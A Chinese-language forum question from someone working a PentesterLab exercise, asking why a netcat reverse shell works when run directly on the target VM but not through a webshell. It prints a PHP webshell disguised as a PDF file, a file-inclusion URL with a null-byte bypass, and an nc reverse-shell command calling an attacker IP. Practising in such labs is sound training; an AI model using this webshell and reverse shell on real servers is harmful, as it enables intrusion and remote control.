我正在做 PentesterLab 的练习, 我有一个名为 1.pdf 的 webshell,它可以作为 PHP 文件包含在 index.php 中。它包含如下代码:
%PDF-1.4
<?php
echo system($_GET["cmd"]);
?>
现在我想使用 nc 和以下命令创建一个反向 shell,但它不能正常工作:
index.php?page=uploads/1.pdf%00&cmd=/bin/nc 192.168.117.128 8001 -e /bin/bash
如果我在 192.168.117.128 输入命令然后输入,则没有任何输出。
同时,如果我直接在 VM(目标服务器)中运行以下命令,它会正确连接到攻击者:
/bin/nc 192.168.117.128 8001 -e /bin/bash
命令的输出在 192.168.117.128 正确回显
我想知道为什么 netcat 在 VM 中正常工作但在 webshell 中不起作用?感谢任何人的帮助,谢谢。